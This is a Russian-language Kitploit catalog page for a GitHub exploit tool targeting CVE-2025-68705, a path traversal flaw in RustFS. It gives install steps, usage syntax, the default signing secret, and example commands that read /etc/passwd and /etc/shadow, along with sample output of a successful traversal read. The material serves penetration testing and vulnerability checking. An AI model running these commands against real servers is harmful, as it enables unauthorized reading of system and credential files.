Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-68705 — CVE-2025-68705 RustFS Path Traversal Vulnerability Check | Kitploit
Инструменты/GitHubGitHub/imjdl/cve-2025-68705
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubimjdl/cve-2025-68705

CVE-2025-68705

CVE-2025-68705 RustFS Path Traversal Vulnerability Check

Репозиторий
17 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-68705 - Эксплойт Path Traversal для RustFS

Описание

Этот скрипт эксплуатирует уязвимость path traversal (CVE-2025-68705) в RustFS, которая позволяет читать произвольные файлы на сервере.

Требования

  • Python 3.6+
  • Смотрите requirements.txt для зависимостей

Установка

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt

Использование

root@kitploit:~
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

Обязательные аргументы

АргументОписание
-H, --hostIP-адрес или имя хоста цели
-p, --portНомер порта цели
-f, --fileПуть к файлу для чтения (необязателен с --check-only)

Необязательные аргументы

Примеры

Чтение файла /etc/passwd

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd

Чтение /etc/shadow с пользовательским смещением и длиной

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024

Использование пользовательского секретного ключа

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret

Только проверить, уязвим ли цель

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 --check-only

Чтение определённого диапазона файла

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200

Пример вывода

root@kitploit:~
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp

Лицензия

Этот проект лицензируется по лицензии MIT — подробности смотрите в файле LICENSE.

Ссылки

  • Уведомление безопасности RustFS
  • CVE-2025-68705
Скачать инструмент
АргументОписаниеПо умолчанию
-s, --secretСекретный ключ для подписиrustfsadmin
-o, --offsetСмещение чтения файла0
-l, --lengthКоличество байт для чтения4096
--check-onlyТолько проверить, уязвим ли цель-